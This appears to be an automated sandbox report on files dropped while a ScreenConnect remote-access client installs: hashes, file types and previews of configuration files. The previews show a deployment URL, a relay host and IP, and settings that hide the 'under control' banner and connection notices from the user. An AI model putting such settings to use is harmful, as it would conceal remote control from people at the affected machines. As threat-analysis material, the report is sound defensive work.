                                                                                                                                                                                                                                                SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                                                                                                                                                SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):26722
                                                                                                                                                                                                                                                Entropy (8bit):7.7401940386372345
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                                                                                                                                                MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                                                                                                                                                SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                                                                                                                                                SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                                                                                                                                                SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2203
                                                                                                                                                                                                                                                Entropy (8bit):4.678633020120548
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHA:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHm
                                                                                                                                                                                                                                                MD5:5556CAB5FCC902DF0AB1D873B4C86E6A
                                                                                                                                                                                                                                                SHA1:A8DCA7F01984B86DD0D73D4D9BBB629A71F42960
                                                                                                                                                                                                                                                SHA-256:15CDDBF50CA1B23951048857088AC35D5FBBEE6BFC9523676152CF42E291CC95
                                                                                                                                                                                                                                                SHA-512:C50D88DF2599BB636C9C2F888958A682266527C33DA2CC0355F8135DB04E5440DD85DA9A66F53F2AE3EB086E6013C92EB626C0BBEBCD13DCD1F34DF731E444CE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):569
                                                                                                                                                                                                                                                Entropy (8bit):5.0687349524326955
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO4Y3IEm/vXbAa3xT:2dL9hK6E46YPzz8vH
                                                                                                                                                                                                                                                MD5:E374D37801CDEBE01DF27991F13BD78B
                                                                                                                                                                                                                                                SHA1:15FEBACF5CEB5FFB501A6ABD6384A85D625A066E
                                                                                                                                                                                                                                                SHA-256:71E7E3F4972BDD4CB98809973064F0A34A7E2377CC48E3C50017BA622E35F446
                                                                                                                                                                                                                                                SHA-512:BAFADD7B56FFAD46D64B01D860D4A269D65AD294C45BC7520F667DF5CAB2B5104DDC90E0FCD34A531093884349F349E96B5CF10344BAE261BEBD108166FCBCAE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>0bd0.adrsxpjm0rga0n.de=104.168.134.232-22%2f12%2f2024%2011%3a47%3a44</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):68096
                                                                                                                                                                                                                                                Entropy (8bit):6.068776675019683
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                                                                                                                                                                                MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                                                                                                                                                                                SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                                                                                                                                                                                SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                                                                                                                                                                                SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1373
                                                                                                                                                                                                                                                Entropy (8bit):5.369201792577388
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
                                                                                                                                                                                                                                                MD5:1BF0A215F1599E3CEC10004DF6F37304
                                                                                                                                                                                                                                                SHA1:169E7E91AC3D25D07050284BB9A01CCC20159DE7
                                                                                                                                                                                                                                                SHA-256:D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
                                                                                                                                                                                                                                                SHA-512:68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                Size (bytes):1662
                                                                                                                                                                                                                                                Entropy (8bit):5.368796786510097
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:M1H2HKQ71qHGIs0HKGAHKKkKYHKGSI6oPtHTH+JHvHlu:gWq+wmj0qxqKkKYqGSI6oPtzHIPQ
                                                                                                                                                                                                                                                MD5:F133699E2DFF871CA4DC666762B5A7FF
                                                                                                                                                                                                                                                SHA1:185FC7D230FC1F8AFC9FC2CF4899B8FFD21BCC57
                                                                                                                                                                                                                                                SHA-256:9BA0C7AEE39ACD102F7F44D289F73D94E2FD0FCD6005A767CD63A74848F19FC7
                                                                                                                                                                                                                                                SHA-512:8140CDCE2B3B92BF901BD143BFC8FB4FE8F9677036631939D30099C7B2BB382F1267A435E1F5C019EFFFF666D7389F77B06610489D73694FA31D16BD04CAF20A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                File Type:CSV text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):847
                                                                                                                                                                                                                                                Entropy (8bit):5.345615485833535
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                                                                                                                                                                                                                MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                                                                                                                                                                                                                SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                                                                                                                                                                                                                SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                                                                                                                                                                                                                SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (651), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):15204
                                                                                                                                                                                                                                                Entropy (8bit):3.8085344828723042
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:t6BKRJdMrXUknJGDYUBBaOy0l6JdMrXUknJGD/DS8/58Ok/sJdMrXUknJGDYT/aD:+7UknJzUa27UknJQ3o7UknJ/lLEv
                                                                                                                                                                                                                                                MD5:28D207908A74807481138D0381461051
                                                                                                                                                                                                                                                SHA1:71E0126BE6433F7A7C01931391431B70FD9E1460
                                                                                                                                                                                                                                                SHA-256:602D66FA30B7098183AFB2EE5103A14AA00CEC84AD9CC130E69C4008E773F265
                                                                                                                                                                                                                                                SHA-512:71E7B5CBEC66665B2E502C023ABBBFE5B9CB622AC7B9DAD9C82824658DADAD52D6AE73113DC03CF567627CECA1BED51ECCAF888C609B9AE302B25BDF21407E77
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:PLATFORM VERSION INFO.. Windows : 10.0.19045.0 (Win32NT).. Common Language Runtime : 4.0.30319.42000.. System.Deployment.dll : 4.8.4270.0 built by: NET48REL1LAST_C.. clr.dll : 4.8.4515.0 built by: NET48REL1LAST_C.. dfdll.dll : 4.8.4270.0 built by: NET48REL1LAST_C.. dfshim.dll : 10.0.19041.30000 (WinBuild.160101.0800)....SOURCES.. Deployment url : https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=0bd0.adrsxpjm0rga0n.de&p=8041&s=12a62791-
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):117905
                                                                                                                                                                                                                                                Entropy (8bit):5.586337100898901
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3072:0aN8cT51/FXvMVNWfCXq9ymhm2o9HuzhJOvP:0VcfiVI3mt8vOvP
                                                                                                                                                                                                                                                MD5:A4FE50A6C913DF40834230E7ABF10CE9
                                                                                                                                                                                                                                                SHA1:AD8C36976A5D33D1A4DE1A55F4598828C0F41A0A
                                                                                                                                                                                                                                                SHA-256:66CB8DCE9EB73D465B607088654C44D55002013B41069F74FDFF9AD42EF7AB2A
                                                                                                                                                                                                                                                SHA-512:200DCADA2C2F936E0E41B9AAF918F1F85F57D7E7388465DC8DD01E47EC2C52D28BD7BBD2B58FBA72C6040253BF5968ADAD49762F3252E45C8A842622956EB9EC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):197120
                                                                                                                                                                                                                                                Entropy (8bit):6.58476728626163
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                                                                                                                                                                                MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                                                                                                                                                                                SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                                                                                                                                                                                SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                                                                                                                                                                                SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1041
                                                                                                                                                                                                                                                Entropy (8bit):5.147328807370198
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
                                                                                                                                                                                                                                                MD5:2EA1AC1E39B8029AA1D1CEBB1079C706
                                                                                                                                                                                                                                                SHA1:5788C00093D358F8B3D8A98B0BEF5D0703031E3F
                                                                                                                                                                                                                                                SHA-256:8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
                                                                                                                                                                                                                                                SHA-512:6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):68096
                                                                                                                                                                                                                                                Entropy (8bit):6.068776675019683
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                                                                                                                                                                                MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                                                                                                                                                                                SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                                                                                                                                                                                SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                                                                                                                                                                                SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1636
                                                                                                                                                                                                                                                Entropy (8bit):5.084538887646832
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
                                                                                                                                                                                                                                                MD5:E11E5D85F8857144751D60CED3FAE6D7
                                                                                                                                                                                                                                                SHA1:7E0AE834C6B1DEA46B51C3101852AFEEA975D572
                                                                                                                                                                                                                                                SHA-256:ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
                                                                                                                                                                                                                                                SHA-512:5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):95520
                                                                                                                                                                                                                                                Entropy (8bit):6.505346220942731
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                                                                                                                                                                                MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                                                                                                                                                                                SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                                                                                                                                                                                SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):548864
                                                                                                                                                                                                                                                Entropy (8bit):6.031251664661689
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                                                                                                                                                                                MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                                                                                                                                                                                SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                                                                                                                                                                                SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                                                                                                                                                                                SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
